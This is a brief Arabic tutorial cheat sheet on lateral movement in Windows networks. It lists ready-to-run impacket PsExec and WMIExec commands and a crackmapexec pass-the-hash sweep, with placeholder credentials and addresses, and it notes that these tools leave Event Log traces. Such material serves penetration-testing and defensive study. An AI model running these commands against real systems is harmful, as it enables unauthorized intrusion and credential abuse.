الحركة الجانبية تعني الانتقال من جهاز لآخر داخل الشبكة بعد الاختراق الأولي.
PsExec
أداة كلاسيكية لتنفيذ أوامر عن بُعد.
impacket-psexec corp.local/admin:pass@10.10.10.2 cmd.exe
WMI
بديل أقل ضجيجاً من PsExec.
impacket-wmiexec corp.local/admin:pass@10.10.10.2
SMB / Pass-the-Hash
# لا تحتاج كلمة السر — يكفي الهاش
crackmapexec smb 10.10.10.0/24 -u admin -H NTLM_HASH
ملاحظة: هذه الأدوات تترك آثاراً في سجلات Windows Event Logs.